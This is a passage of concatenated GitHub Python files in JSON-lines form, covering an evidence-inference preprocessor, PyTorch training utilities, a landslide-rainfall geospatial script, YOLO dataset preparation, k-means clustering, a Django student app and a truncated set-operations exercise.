\n\n str_to_idx = vectorizer.vocabulary_\n str_to_idx[SimpleInferenceVectorizer.PAD] = max(vectorizer.vocabulary_.values())\n str_to_idx[SimpleInferenceVectorizer.UNK] = str_to_idx[SimpleInferenceVectorizer.PAD]+1\n \n # note that for now the vectorizer is fit using only the\n # article texts (i.e., the vocab is based on words in full-texts,\n # not in prompts necessarily).\n return SimpleInferenceVectorizer(str_to_idx, tokenizer)\n\n\ndef read_annotations():\n anno_df = pd.read_csv(anno_csv_path)\n # we need to force EVIDENCE_COL_NAME to be strings in all cases; pandas occasionally reads some values as floats.\n anno_df = anno_df[anno_df.apply(lambda row: bool(row[VALID_LABEL]) and bool(row[VALID_REASONING]) and len(str(row[EVIDENCE_COL_NAME])) > 0 and row[LABEL] != 'invalid prompt', axis=1)]\n #annos[~annos[\"Answer_Val\"].isin([-1, 0, 1])]\n # TODO revisit this; right now just overwriting for convienence\n # anno_df[\"Answer_Val\"].replace({3:0}, inplace=True)\n return anno_df\n\n\ndef read_prompts():\n prompts_df = pd.read_csv(prompts_csv_path)\n prompts_df = prompts_df[prompts_df.apply(lambda row: all(map(lambda x: type(x) == str and x is not None and bool(x.strip()), [row['Comparator'], row['Intervention'], row['Outcome']])), axis=1)]\n return prompts_df \n\ndef assemble_Xy_for_prompts(training_prompts, inference_vectorizer, lbls_too=False, annotations=None, sections_of_interest=None, include_sentence_span_splits=False, include_raw_texts=False): \n Xy = []\n for prompt_id in training_prompts[PROMPT_ID_COL_NAME].values:\n if lbls_too:\n Xy_dict = inference_vectorizer.vectorize(training_prompts, prompt_id, \n include_lbls=True, annotations_df=annotations, sections_of_interest=sections_of_interest, \n include_sentence_span_splits=include_sentence_span_splits, include_raw_text=include_raw_texts)\n else:\n Xy_dict = inference_vectorizer.vectorize(training_prompts, prompt_id, sections_of_interest=sections_of_interest, \n include_sentence_span_splits=include_sentence_span_splits, include_raw_text=include_raw_texts)\n Xy.append(Xy_dict)\n return Xy\n\n\ndef _read_ids(f):\n with open(f, 'r') as tf:\n ids = list(int(x.strip()) for x in tf.readlines())\n ids_dict = OrderedDict()\n for x in ids:\n ids_dict[x] = x\n return set(ids_dict.keys())\n\ndef train_document_ids():\n \"\"\" Returns the set of document ids for a fixed training set \"\"\"\n return _read_ids(_train_id_file)\n\ndef validation_document_ids():\n \"\"\" Returns the set of document ids for a fixed validation set \"\"\"\n return _read_ids(_validation_id_file)\n\ndef test_document_ids():\n \"\"\" Returns the set of documents for a fixed test set \"\"\"\n return _read_ids(_test_id_file)\n\ndef get_train_Xy(train_doc_ids, sections_of_interest=None, vocabulary_file=None, include_sentence_span_splits=False, include_raw_texts=False):\n \"\"\" Loads the relevant documents, builds a vectorizer, and returns a list of training instances\"\"\"\n prompts = read_prompts()\n annotations = read_annotations()\n\n\n # filter out prompts for which we do not have annotations for whatever reason\n # this was actually just one case; not sure what was going on there.\n def have_annotations_for_prompt(prompt_id):\n return len(annotations[annotations[PROMPT_ID_COL_NAME] == prompt_id]) > 0\n\n prompts = [prompt for row_idx, prompt in prompts.iterrows() if \n have_annotations_for_prompt(prompt[PROMPT_ID_COL_NAME])]\n prompts = pd.DataFrame(prompts)\n\n inference_vectorizer = get_inference_vectorizer(article_ids=train_doc_ids, sections_of_interest=sections_of_interest, vocabulary_file=vocabulary_file)\n\n training_prompts = prompts[prompts[STUDY_ID_COL].isin(train_doc_ids)]\n\n training_prompts = pd.DataFrame(training_prompts)\n train_Xy = assemble_Xy_for_prompts(training_prompts, inference_vectorizer, lbls_too=True, annotations=annotations, include_sentence_span_splits=include_sentence_span_splits, include_raw_texts=include_raw_texts)\n\n return train_Xy, inference_vectorizer\n\n\ndef get_Xy(docids, inference_vectorizer: 'SimpleInferenceVectorizer', sections_of_interest=None, include_sentence_span_splits=False, include_raw_texts=False):\n prompts = read_prompts()\n annotations = read_annotations()\n\n # filter out prompts for which we do not have annotations for whatever reason\n # this was actually just one case; not sure what was going on there.\n def have_annotations_for_prompt(prompt_id):\n return len(annotations[annotations[PROMPT_ID_COL_NAME] == prompt_id]) > 0\n\n prompts = [prompt for row_idx, prompt in prompts.iterrows() if\n have_annotations_for_prompt(prompt[PROMPT_ID_COL_NAME])]\n prompts = pd.DataFrame(prompts)\n\n prompts = prompts[prompts[STUDY_ID_COL].isin(docids)]\n Xy = assemble_Xy_for_prompts(prompts, inference_vectorizer, lbls_too=True, annotations=annotations, sections_of_interest=sections_of_interest, include_sentence_span_splits=include_sentence_span_splits, include_raw_texts=include_raw_texts)\n return Xy\n\n\nclass SimpleInferenceVectorizer:\n UNK = \"\"\n PAD = \"\"\n\n def __init__(self, str_to_idx, tokenizer):\n self.str_to_idx = str_to_idx\n self.idx_to_str = [None]*(len(self.str_to_idx))\n self.sentence_splits = {} # map of article ids to array of sentence splits\n self.token_evidence = {}\n \n for w, idx in self.str_to_idx.items():\n try:\n self.idx_to_str[idx] = w \n except:\n import pdb; pdb.set_trace()\n\n self.tokenizer = tokenizer\n\n def string_to_seq(self, s):\n tokenized = self.tokenizer(s)\n unk_idx = self.str_to_idx[SimpleInferenceVectorizer.UNK]\n vectorized = [self.str_to_idx.get(token, unk_idx) for token in tokenized]\n return np.array(vectorized)\n\n def vectorize(self, prompts_df, prompt_id, include_lbls=False, annotations_df=None, sections_of_interest=None, \n include_sentence_span_splits=False, include_raw_text=False):\n \"\"\"\n Vectorize the prompt specified by the ID.\n \"\"\"\n if include_lbls and annotations_df is None:\n raise ValueError(\"When including annotations, they must already be defined\")\n\n prompt = prompts_df[prompts_df[PROMPT_ID_COL_NAME]==prompt_id]\n\n ###\n # vectorize the article itself.\n article_id = str(prompt[STUDY_ID_COL].values[0])\n article = get_article(article_id)\n article_text = extract_raw_text(article, sections_of_interest)\n article_text = article_text.lower()\n vectorized_article = self.string_to_seq(article_text)\n \n ###\n # and now vectorize the prompt (I/C/O)\n I_v = self.string_to_seq(prompt[\"Intervention\"].values[0].lower())\n C_v = self.string_to_seq(prompt[\"Comparator\"].values[0].lower())\n O_v = self.string_to_seq(prompt[\"Outcome\"].values[0].lower())\n\n return_dict = {\"article\":vectorized_article, \"I\":I_v, \"C\":C_v, \"O\":O_v, \"a_id\": article_id, \"p_id\": prompt_id}\n\n if include_lbls:\n # then also read out the labels.\n assert (annotations_df is not None)\n annotations_for_prompt = annotations_df[annotations_df[PROMPT_ID_COL_NAME] == prompt_id]\n labels = annotations_for_prompt[[LBL_COL_NAME,EVIDENCE_COL_NAME]].values\n return_dict[\"y\"] = labels\n # remove html tags\n for l in labels:\n parser.feed(str(l[1]))\n l[1] = parser.get_data()\n \n spans = annotations_for_prompt[[EVIDENCE_START,EVIDENCE_END]].values\n if len(spans) > 0 and sections_of_interest is None:\n # split into sentences, find which are evidence, and also encode all.\n sentence_spans = []\n if include_raw_text or include_sentence_span_splits:\n sen = split_into_sentences(article_id, article_text, self.sentence_splits)\n if include_raw_text:\n return_dict[\"all_article_sentences\"] = sen \n\n if include_sentence_span_splits:\n tmp = find_span_location(sen, [s[0] for s in spans], [e[1] for e in spans])\n for t in tmp:\n sentence_spans.append([self.string_to_seq(t[0]), t[1]])\n \n # encode the evidence spans \n evidence_spans = set()\n for start, end in spans:\n article_before_span = article_text[:int(start)]\n # +1 because the slice gets every character (and therefore token) *before* the evidence, so we want to offset the token count by 1 to actually start in the evidence\n span_start_idx = len(self.tokenizer(article_before_span)) + 1\n article_at_end_of_span = article_text[:int(end)]\n span_end_idx = len(self.tokenizer(article_at_end_of_span))\n evidence_spans.add((span_start_idx, span_end_idx))\n \n return_dict['sentence_span'] = sentence_spans \n return_dict['evidence_spans'] = evidence_spans\n if include_sentence_span_splits:\n return_dict['token_ev_labels'] = gen_exact_evid_array(sentence_spans, evidence_spans, return_dict, self.idx_to_str)\n \n return return_dict\n\n def decode(self, v):\n return [self.idx_to_str[idx] for idx in v]\n","repo_name":"jayded/evidence-inference","sub_path":"evidence_inference/preprocess/preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":16616,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"32"}
+{"seq_id":"102199253","text":"import atexit\nimport functools\nimport logging\nimport os\nimport random\nimport sys\nfrom collections import defaultdict\nfrom dataclasses import fields, is_dataclass\nfrom typing import Any, Mapping, Protocol, runtime_checkable\n\nimport hydra\n\nimport numpy as np\nimport torch\nimport torch.distributed as dist\nfrom iopath.common.file_io import g_pathmgr\nfrom omegaconf import OmegaConf\n\n\ndef register_omegaconf_resolvers():\n OmegaConf.register_new_resolver(\"get_method\", hydra.utils.get_method)\n OmegaConf.register_new_resolver(\"get_class\", hydra.utils.get_class)\n OmegaConf.register_new_resolver(\"times\", lambda x, y: x * y)\n OmegaConf.register_new_resolver(\"divide\", lambda x, y: x / y)\n OmegaConf.register_new_resolver(\"range\", lambda x: list(range(x)))\n OmegaConf.register_new_resolver(\"int\", lambda x: int(x))\n\n\ndef setup_distributed_backend(backend):\n \"\"\"\n Initialize torch.distributed and set the CUDA device.\n Expects environment variables to be set as per\n https://pytorch.org/docs/stable/distributed.html#environment-variable-initialization\n along with the environ variable \"LOCAL_RANK\" which is used to set the CUDA device.\n This is run inside a new process, so the cfg is reset and must be set explicitly.\n \"\"\"\n local_rank = int(os.environ[\"LOCAL_RANK\"])\n torch.distributed.init_process_group(backend=backend)\n\n\ndef get_machine_local_and_dist_rank():\n \"\"\"\n Get the distributed and local rank of the current gpu.\n \"\"\"\n local_rank = int(os.environ.get(\"LOCAL_RANK\", None))\n distributed_rank = int(os.environ.get(\"RANK\", None))\n assert (\n local_rank is not None and distributed_rank is not None\n ), \"Please the set the RANK and LOCAL_RANK environment variables.\"\n return local_rank, distributed_rank\n\n\ndef print_cfg(cfg):\n \"\"\"\n Supports printing both Hydra DictConfig and also the AttrDict config\n \"\"\"\n logging.info(\"Training with config:\")\n logging.info(OmegaConf.to_yaml(cfg))\n\n\ndef set_seeds(seed_value, max_epochs, dist_rank):\n \"\"\"\n Set the python random, numpy and torch seed for each gpu. Also set the CUDA\n seeds if the CUDA is available. This ensures deterministic nature of the training.\n \"\"\"\n # Since in the pytorch sampler, we increment the seed by 1 for every epoch.\n seed_value = (seed_value + dist_rank) * max_epochs\n logging.info(f\"MACHINE SEED: {seed_value}\")\n random.seed(seed_value)\n np.random.seed(seed_value)\n torch.manual_seed(seed_value)\n if torch.cuda.is_available():\n torch.cuda.manual_seed_all(seed_value)\n\n\ndef makedir(dir_path):\n \"\"\"\n Create the directory if it does not exist.\n \"\"\"\n is_success = False\n try:\n if not g_pathmgr.exists(dir_path):\n g_pathmgr.mkdirs(dir_path)\n is_success = True\n except BaseException:\n logging.info(f\"Error creating directory: {dir_path}\")\n return is_success\n\n\ndef is_dist_avail_and_initialized():\n if not dist.is_available():\n return False\n if not dist.is_initialized():\n return False\n return True\n\n\ndef get_amp_type(amp_type: str):\n\n assert amp_type in [\"bfloat16\", \"float16\"], \"Invalid Amp type.\"\n\n if amp_type == \"bfloat16\":\n return torch.bfloat16\n else:\n return torch.float16\n\n\n@runtime_checkable\nclass _CopyableData(Protocol):\n def to(self, device: torch.device, *args: Any, **kwargs: Any):\n \"\"\"Copy data to the specified device\"\"\"\n ...\n\n\ndef _is_named_tuple(x) -> bool:\n return isinstance(x, tuple) and hasattr(x, \"_asdict\") and hasattr(x, \"_fields\")\n\n\ndef copy_data_to_device(data, device: torch.device, *args: Any, **kwargs: Any):\n \"\"\"Function that recursively copies data to a torch.device.\n\n Args:\n data: The data to copy to device\n device: The device to which the data should be copied\n args: positional arguments that will be passed to the `to` call\n kwargs: keyword arguments that will be passed to the `to` call\n\n Returns:\n The data on the correct device\n \"\"\"\n\n if _is_named_tuple(data):\n return type(data)(\n **copy_data_to_device(data._asdict(), device, *args, **kwargs)\n )\n elif isinstance(data, (list, tuple)):\n return type(data)(copy_data_to_device(e, device, *args, **kwargs) for e in data)\n elif isinstance(data, defaultdict):\n return type(data)(\n data.default_factory,\n {\n k: copy_data_to_device(v, device, *args, **kwargs)\n for k, v in data.items()\n },\n )\n elif isinstance(data, Mapping):\n return type(data)(\n {\n k: copy_data_to_device(v, device, *args, **kwargs)\n for k, v in data.items()\n }\n )\n elif is_dataclass(data) and not isinstance(data, type):\n new_data_class = type(data)(\n **{\n field.name: copy_data_to_device(\n getattr(data, field.name), device, *args, **kwargs\n )\n for field in fields(data)\n if field.init\n }\n )\n for field in fields(data):\n if not field.init:\n setattr(\n new_data_class,\n field.name,\n copy_data_to_device(\n getattr(data, field.name), device, *args, **kwargs\n ),\n )\n return new_data_class\n elif isinstance(data, _CopyableData):\n return data.to(device, *args, **kwargs)\n return data\n\n\ndef move_optimizer_state_to_device(\n optimizer: torch.optim.Optimizer, device: torch.device\n) -> torch.optim.Optimizer:\n optimizer.state = copy_data_to_device(optimizer.state, device)\n return optimizer\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self, name, device, fmt=\":f\"):\n self.name = name\n self.fmt = fmt\n self.device = device\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n self._allow_updates = True\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n def synchronize(self):\n assert self._allow_updates, \"Please reset the meter to allow synchronization.\"\n if not is_dist_avail_and_initialized():\n return\n t = torch.tensor(\n [self.sum, self.count], dtype=torch.float64, device=self.device\n )\n dist.barrier()\n dist.all_reduce(t)\n t = t.tolist()\n self.sum = int(t[0])\n self.count = t[1]\n self.avg = self.sum / self.count if self.count > 0 else np.nan\n self._allow_updates = False\n\n def __str__(self):\n fmtstr = \"{name} {val\" + self.fmt + \"} ({avg\" + self.fmt + \"})\"\n return fmtstr.format(**self.__dict__)\n\n\nclass ProgressMeter(object):\n def __init__(self, num_batches, meters, prefix=\"\"):\n self.batch_fmtstr = self._get_batch_fmtstr(num_batches)\n self.meters = meters\n self.prefix = prefix\n\n def display(self, batch):\n entries = [self.prefix + self.batch_fmtstr.format(batch)]\n entries += [str(meter) for meter in self.meters]\n logging.info(\"\\t\".join(entries))\n\n def synchronize(self):\n for meter in self.meters:\n meter.synchronize()\n\n def _get_batch_fmtstr(self, num_batches):\n num_digits = len(str(num_batches // 1))\n fmt = \"{:\" + str(num_digits) + \"d}\"\n return \"[\" + fmt + \"/\" + fmt.format(num_batches) + \"]\"\n\n\ndef get_resume_checkpoint(checkpoint_save_dir):\n\n if not g_pathmgr.isdir(checkpoint_save_dir):\n return None\n ckpt_file = os.path.join(checkpoint_save_dir, \"checkpoint.pt\")\n if not g_pathmgr.isfile(ckpt_file):\n return None\n\n return ckpt_file\n\n\n# TODO: Move this to a separate logging file.\n\n\ndef setup_logging(name, output_dir=None, rank=0):\n \"\"\"\n Setup various logging streams: stdout and file handlers.\n For file handlers, we only setup for the master gpu.\n \"\"\"\n # get the filename if we want to log to the file as well\n log_filename = None\n if output_dir:\n makedir(output_dir)\n if rank == 0:\n log_filename = f\"{output_dir}/log.txt\"\n\n logger = logging.getLogger(name)\n logger.setLevel(logging.DEBUG)\n\n # create formatter\n FORMAT = \"%(levelname)s %(asctime)s %(filename)s:%(lineno)4d: %(message)s\"\n formatter = logging.Formatter(FORMAT)\n\n # clean up any pre-existing handlers\n for h in logger.handlers:\n logger.removeHandler(h)\n logger.root.handlers = []\n\n # setup the console handler\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setLevel(logging.DEBUG)\n console_handler.setFormatter(formatter)\n logger.addHandler(console_handler)\n\n # we log to file as well if user wants\n if log_filename and rank == 0:\n file_handler = logging.StreamHandler(_cached_log_stream(log_filename))\n file_handler.setLevel(logging.DEBUG)\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n\n logging.root = logger\n\n\n# cache the opened file object, so that different calls to `setup_logger`\n# with the same file name can safely write to the same file.\n@functools.lru_cache(maxsize=None)\ndef _cached_log_stream(filename):\n # we tune the buffering value so that the logs are updated\n # frequently.\n log_buffer_kb = 10 * 1024 # 10KB\n io = g_pathmgr.open(filename, mode=\"a\", buffering=log_buffer_kb)\n atexit.register(io.close)\n return io\n\n\ndef shutdown_logging():\n \"\"\"\n After training is done, we ensure to shut down all the logger streams.\n \"\"\"\n logging.info(\"Shutting down loggers...\")\n handlers = logging.root.handlers\n for handler in handlers:\n handler.close()\n","repo_name":"facebookresearch/omnivore","sub_path":"omnivision/utils/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9955,"program_lang":"python","lang":"en","doc_type":"code","stars":525,"dataset":"github-code","pt":"32"}
+{"seq_id":"24588082881","text":"import os\nimport rasterio\nimport pandas as pd\nimport geopandas as gp\nfrom matplotlib import pyplot as plt\nfrom functools import reduce\nfrom geopandas import GeoDataFrame\nfrom shapely.geometry import Polygon, Point\nfrom rasterio.features import shapes\n\nclass Slidding:\n\n\texport_rain = pd.DataFrame()\n\tdeslizamientos = pd.DataFrame()\t\n\tmunicipios = pd.DataFrame()\n\tfolder = '../Datos/CHIRPS/'\n\trasters = []\n\n\tdef __init__(self, folder = '../Datos/CHIRPS/') -> None:\n\t\tself.folder = folder\n\n\tdef get_date(self, tiff_path):\n\t\ttiff_name = tiff_path.split('/')[-1]\n\t\tdate = '-'.join(tiff_name.split('.')[:-1])\n\t\treturn date\n\n\tdef open_tiff(self, src, date, mask = None):\n\t\tresults = []\n\t\tfor s, v in shapes(src.read(), mask=mask, transform=src.meta['transform']):\n\t\t\tdata = {\n\t\t\t\t'properties': {date: v}, \n\t\t\t\t'geometry': Polygon(s['coordinates'][0]).centroid\n\t\t\t}\n\t\t\tresults.append(data)\n\t\treturn results\n\n\tdef get_raster(self, path):\n\t\tsrc = rasterio.open(path)\n\t\tcrs = src.read_crs()\n\t\tdate = self.get_date(path)\n\t\ttiff = self.open_tiff(src, date)\n\t\tsrc.close()\n\t\traster = GeoDataFrame.from_features(tiff, crs=crs)\n\t\traster['geometry'] = raster['geometry'].to_crs(crs)\n\t\treturn raster\n\n\tdef get_rasters(self):\n\t\tfor file in os.listdir(self.folder):\n\t\t\tif file.endswith('.tif'):\n\t\t\t\tpath = os.path.join(self.folder, file)\n\t\t\t\traster = self.get_raster(path)\n\t\t\t\tself.rasters.append(raster)\n\t\treturn self.rasters\n\n\tdef get_municipios(self):\n\t\tself.municipios = gp.read_file('procesamiento/MGN_ANM_MPIOS.geojson')\n\t\tself.municipios = self.municipios[['DPTO_CCDGO', 'MPIO_CCDGO', 'geometry']]\n\t\treturn self.municipios\n\n\tdef run(self):\n\t\tself.get_rasters()\n\t\tself.get_municipios()\n\t\t\n\t\tself.deslizamientos = gp.read_file('procesamiento/INVENTARIO_FINAL_MM.csv')\n\t\tself.deslizamientos.columns = ['movimiento', 'fecha', 'municipio', 'latitud', 'longitud', 'fuente', 'geometry']\n\t\tself.deslizamientos.geometry = self.deslizamientos.apply(lambda row: Point(float(row['longitud']), float(row['latitud'])), axis=1)\n\t\t# print(deslizamientos.shape)\n\n\t\tself.deslizamientos = self.deslizamientos[['geometry', 'movimiento', 'fecha', 'fuente']]\n\t\tself.deslizamientos.fecha = pd.to_datetime(self.deslizamientos.fecha, format='%d/%m/%Y')\n\t\tself.deslizamientos.set_crs(epsg=4326, inplace=True)\n\t\t# print(deslizamientos.shape)\n\n\t\tself.deslizamientos = self.deslizamientos[self.deslizamientos.fecha >= '2010-01-01']\n\t\t# print(deslizamientos.shape)\n\t\t# deslizamientos.head()\n\n\t\treturn self.deslizamientos\n\n\tdef export_to_geoJson(self):\n\t\t\n\t\tmunicipios = gp.read_file('procesamiento/MGN_ANM_MPIOS.geojson')\n\t\tmunicipios = municipios[['DPTO_CCDGO', 'MPIO_CCDGO', 'geometry']]\n\t\tprint(municipios.shape)\n\t\tmunicipios.head()\n\n\t\t# Obtener los municipios que contienen deslizamientos\n\t\tgeodata = gp.sjoin(self.deslizamientos, municipios, how='left', predicate='intersects')\n\t\tgeodata = geodata[geodata['index_right'].notna()]\n\t\tgeodata = geodata.drop(columns=['index_right'])\n\t\t# print(geodata.shape)\n\t\t# Exportar a GeoJSON\n\t\tgeodata.to_file('deslizamientos.geojson', driver='GeoJSON')\n\t\t# geodata.head()","repo_name":"karinstefa/VA_project","sub_path":"Slidding.py","file_name":"Slidding.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"38387809784","text":"\n\"\"\"\nNoting down steps followed:\n\n1. The ultralytics weights file - made a copy in drive and moved it to the required folder in drive itself\n2. Locally create the folder structure as mentioned here https://github.com/theschoolofai/YoloV3\n3. Created custom.data and custom.names locally inside customdata folder\n4. Changed Images/ to \"data/customdata/images\" in train.txt\n5. Changed .txt to .jpg in train.txt\n6. In train.txt, file named \"Aimgg_005.jpg\" is a typo - so rename it to Aimg_005.jpg\n7. In test.txt, file names ImageYolo.jpg does not exists, so remove it\n8. In test.txt, file names M/img_010 does not exists - so rename it to Mimg_010\n\n\"\"\"\n\nimport os\nimport shutil\nimport zipfile as zp\n\nfrom PIL import Image\n\n\n\n\nZOHEB_ZIPFILE_PATH = \"/home/sai/Documents/repos_and_projects/personal_projects/tsai_projects/assignment13_yolo/YoloV3_Dataset.zip\"\nCUSTOMDATA_FOLDERPATH = \"/home/sai/Documents/repos_and_projects/personal_projects/tsai_projects/assignment13_yolo/images_structured/customdata\"\n\nARRANGED_IMGFOLDER = CUSTOMDATA_FOLDERPATH + \"/images\"\nARRANGED_LBLFOLDER = CUSTOMDATA_FOLDERPATH + \"/labels\"\n\n\n# Code for checking if any value in label texts is above 1.000\n\n\n\n\n# Code for checking if file exists:\n\n\nwith open(\"./data/customdata/train.txt\",\"r\") as infl:\n for k in infl:\n k = k.strip()\n if not os.path.exists( \"/home/sai/Documents/repos_and_projects/personal_projects/tsai_projects/assignment13_yolo/\" + k.replace(\"./\",\"\") ):\n print( \"/home/sai/Documents/repos_and_projects/personal_projects/tsai_projects/assignment13_yolo/\" + k.replace(\"./\",\"\") )\n\n\n\n\ndef make_filepath_list(imgfolder, lblfolder):\n image_files = [ os.path.splitext(l)[0] for l in os.listdir(imgfolder) ]\n label_files = [ os.path.splitext(l)[0] for l in os.listdir(lblfolder) ]\n\n image_names = [ os.path.splitext(l)[0] for l in os.listdir(imgfolder) ]\n\n \n\n\n\ndef rearrange_images_labels_and_zip(zipfile_path, customdata_folderpath):\n\n extract_path, extract_folder = os.path.split(zipfile_path)\n extract_folder = extract_folder.replace(\".zip\",\"\")\n\n # Extract contents from zip\n with zp.ZipFile(zipfile_path, \"r\") as zip:\n zip.extractall()\n\n # Define relevant file paths\n imgfolder = extract_folder + \"/Images\"\n lblfolder = extract_folder + \"/Labels\"\n train_file_list = extract_folder + \"/train.txt\"\n test_file_list = extract_folder + \"/test.txt\"\n name_list = extract_folder + \"/classes.txt\"\n\n dest_imgfolder = ARRANGED_IMGFOLDER\n dest_lblfolder = customdata_folderpath + \"/labels\"\n dest_train_file_list = customdata_folderpath + \"/train.txt\"\n dest_test_file_list = customdata_folderpath + \"/test.txt\"\n dest_name_list = customdata_folderpath + \"/custom.names\"\n \n\n shutil.copytree(imgfolder, dest_imgfolder, dirs_exist_ok=True)\n shutil.copytree(lblfolder, dest_lblfolder, dirs_exist_ok=True)\n shutil.copy(train_file_list, dest_train_file_list)\n shutil.copy(test_file_list, dest_test_file_list)\n shutil.copy(name_list, dest_name_list)\n\n\n\ndef rename_image_exts(arranged_imgfolder):\n\n image_filenames = os.listdir(arranged_imgfolder)\n\n for fl in image_filenames:\n fil, ex = os.path.splitext(fl)\n if ex != \".jpg\":\n print(fl)\n\n if ex == \".png\":\n png_to_jpg(image_filepath=os.path.join(arranged_imgfolder, fl))\n else:\n os.rename( os.path.join(arranged_imgfolder, fl), \n os.path.join(arranged_imgfolder, fil+\".jpg\") )\n\n\n\ndef png_to_jpg(image_filepath):\n im = Image.open(image_filepath)\n rgb_im = im.convert(\"RGB\")\n rgb_im.save(image_filepath.replace(\".png\",\".jpg\"))\n os.remove(image_filepath)\n\n\ndef clip_to_ones_in_labels():\n pass\n\n\n\nif __name__ == \"__main__\":\n rearrange_images_labels_and_zip(zipfile_path=ZOHEB_ZIPFILE_PATH, \n customdata_folderpath=CUSTOMDATA_FOLDERPATH)\n# rename_image_exts(arranged_imgfolder=ARRANGED_IMGFOLDER)\n\n\n\n\n","repo_name":"sairamsubramaniam/tsai_projects","sub_path":"assignment13_yolo/yolo_ppe/cleanup_prepare.py","file_name":"cleanup_prepare.py","file_ext":"py","file_size_in_byte":3984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"11919794095","text":"import sys\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\n\n\ndef kmean_cluster(df,clusters):\n\n kmeans_df = df[['principal component 1', 'principal component 2']].copy()\n kmeans = KMeans(init=\"k-means++\", n_clusters=clusters).fit(kmeans_df)\n labels = kmeans.labels_\n X_dist = (kmeans.transform(kmeans_df))\n\n distance = []\n\n for inner_list in X_dist:\n distance.append((min(inner_list)))\n\n kmeans_df['PRED'] = labels\n kmeans_df['test_name'] = df['test_name'].values\n kmeans_df['distance'] = distance\n\n grouped_df = kmeans_df.groupby(\"PRED\")\n grouped_lists = grouped_df[\"test_name\"].apply(list)\n grouped_lists = grouped_lists.reset_index()\n df_result = grouped_lists.explode('test_name')\n grouped_lists.explode('test_name').to_csv(\"clusters.csv\")\n\n return df_result,kmeans\n\ndef plot_kmeans(df, kmeans):\n\n centroids = kmeans.cluster_centers_\n plt.scatter(centroids[:, 0], centroids[:, 1], c='red', s=50)\n plt.scatter(df['principal component 1'], df['principal component 2'], c= kmeans.labels_.astype(float), s=50, alpha=0.5)\n for i, label in enumerate(df['test_name']):\n plt.annotate(i, (df['principal component 1'][i], df['principal component 2'][i]))\n plt.xlabel(\"Component 1\")\n plt.ylabel(\"Component 2\")\n plt.grid()\n plt.show()\n\n\ndef main():\n\n FILE = \"pca.csv\"\n clusters = 2\n\n if len(sys.argv) > 1:\n FILE = sys.argv[1]\n clusters = int(sys.argv[2])\n\n df = pd.read_csv(FILE)\n df_result = kmean_cluster(df,clusters)\n print(df_result)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"VictorRodriguez/doctorado","sub_path":"detector/clustering/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"40537644334","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.db.models import Q\nfrom django.shortcuts import render, redirect\nfrom django.template import loader\nfrom .models import Student, Division\nfrom django.http import HttpResponse\nfrom .models import Student, Division, Teacher, Subject\nfrom .forms import studentForm, teacherform, divisionform, subjectform\n\n\ndef create_student(request):\n form = studentForm()\n if request.method == 'POST':\n form = studentForm(request.POST)\n if form.is_valid():\n form.save()\n return HttpResponse('Saved the student ')\n\n context = {\n 'form': form\n }\n return render(request, 'user/create.html', context)\n\n\ndef create_teacher(request):\n form = teacherform()\n if request.method == 'POST':\n form = teacherform(request.POST)\n if form.is_valid():\n form.save()\n\n context = {\n 'form': form\n }\n return render(request, 'user/teacher.html', context)\n\n\ndef create_division(request):\n form = divisionform()\n if request.method == 'POST':\n form = divisionform(request.POST)\n if form.is_valid():\n form.save()\n\n context = {\n 'form': form\n }\n return render(request, 'user/division.html', context)\n\n\ndef create_subject(request):\n form = subjectform()\n if request.method == 'POST':\n form = subjectform(request.POST)\n if form.is_valid():\n form.save()\n return HttpResponse('Saved... ')\n\n context = {\n 'form': form\n }\n return render(request, 'user/subject.html', context)\n\n\ndef student(request):\n obj = Student.objects.all()\n context = {\n 'obj': obj\n }\n return render(request, 'user/form.html', context)\n\n\ndef get_all_students(request):\n query = request.GET.get('q')\n print(query)\n results = Student.objects.filter(name=query)\n student_in_div = Student.objects.filter(division__name='3A')\n print(student_in_div)\n for result in results:\n stud_sub = Student.objects.filter(division__teacher__subject__name=result.division.teacher.subject.name)\n print(stud_sub)\n context = {\n 'results': results\n }\n return render(request, 'user/get.html', context)\n","repo_name":"Jishin4477/django-app","sub_path":"studentapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"8463367459","text":"'''\r\n\r\n>>> H = set(\"Hacker\")\r\n>>> R = set(\"Rank\")\r\n>>> H.update(R)\r\n>>> print H\r\nset(['a', 'c', 'e', 'H', 'k', 'n', 'r', 'R'])\r\n\r\n>>> H = set(\"Hacker\")\r\n>>> R = set(\"Rank\")\r\n>>> H.intersection_update(R)\r\n>>> print H\r\nset(['a', 'k'])\r\n\r\n>>> H = set(\"Hacker\")\r\n>>> R = set(\"Rank\")\r\n>>> H.difference_update(R)\r\n>>> print H\r\nset(['c', 'e', 'H', 'r'])\r\n\r\n>>> H = set(\"Hacker\")\r\n>>> R = set(\"Rank\")\r\n>>> H.symmetric_difference_update(R)\r\n>>> print H\r\nset(['c', 'e', 'H', 'n', 'r', 'R'])\r\n\r\n'''\r\n\r\nA = set()\r\n\r\nn = int(input('Enter Length of set A: '))\r\n\r\nfor i in range(n):\r\n inpt = int(input('Enter number in Set A: '))\r\n A.add(inpt)\r\n\r\nprint(A)\r\nN = int(input('Enter number of operations: '))\r\n\r\nfor op in range(N):\r\n S = set()\r\n oper = input('Enter name of operation {}: '.format(op+1))\r\n m = int(input('Enter Length of Set S: '))\r\n\r\n for i in range(m):\r\n inpt = int(input('Enter number in Set S: '))\r\n 